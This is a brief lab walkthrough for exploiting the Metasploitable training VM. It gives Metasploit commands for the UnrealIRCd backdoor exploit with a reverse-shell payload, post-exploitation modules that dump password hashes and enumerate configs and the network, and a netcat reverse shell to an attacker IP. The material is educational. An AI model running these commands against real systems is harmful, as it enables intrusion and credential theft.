pwning metasploitable
During the Pluralsight course we have scanned the metasploitable machine using openvas. Now we will use the scan results to pwn the machine.
Abusing unrealircd (port 6667)
Openvas shows that the metasploitable machine is running an outdated version of unrealircd which has a vulnrability in it that can give you a shell in the machine. We will abuse this flaw now:
service postgresql start #start postgres for this exploit to work
msfconsole # start metasploit
workspace -a metasploitable #create a workspace called metasploitable
workspace #lists all the workspaces within metasploit
workspace metasploit #to get into metasploitable workspace
search ircd #search msf for ircd entries -> in this case will return exploit/unix/irc/unreal_ircd_3281_backdoor
info exploit/unix/irc/unreal_ircd_3281_backdoor # returns information about exploit
use exploit/unix/irc/unreal_ircd_3281_backdoor # tells metasploit we want to use this exploit
show options #shows parameters for this exploit
set RHOST <ip of metasploitable> #sets target IP
show payloads #shows all available payloads for this exploit
set PAYLOAD cmd/unix/reverse #sets payload
show options # shows parameters for this payloads
set LHOST<ip of attacker> #sets listener IP
exploit # starts the attack
And now we have a shell in the target machine, PWND!
ctrl + z # background the open session (or close it )
Post Exploitation Activities
use post/linux/gather/hashdump #attempts to get passwords
set SESSION 1 # sets the session required for this exploit
exploit #executes
use post/linux/gather/checkvm #checks if machine is a VM
set SESSION 1 #sets the session requires for this exploit
exploit #executes
use post/linux/gather/enum_configs #get the config files and stores them in our system
set SESSION 1 #sets the session
use post/linux/gater/enum_network #enumerate the network
set SESSION 1 #sets the session
We will use netcad. (but you can also use any rootkit/backdoor/…)
nc -lvp 4444 #setup a listener on your own machine for port 4444
nc -vn <attackerip> -e /bin/bash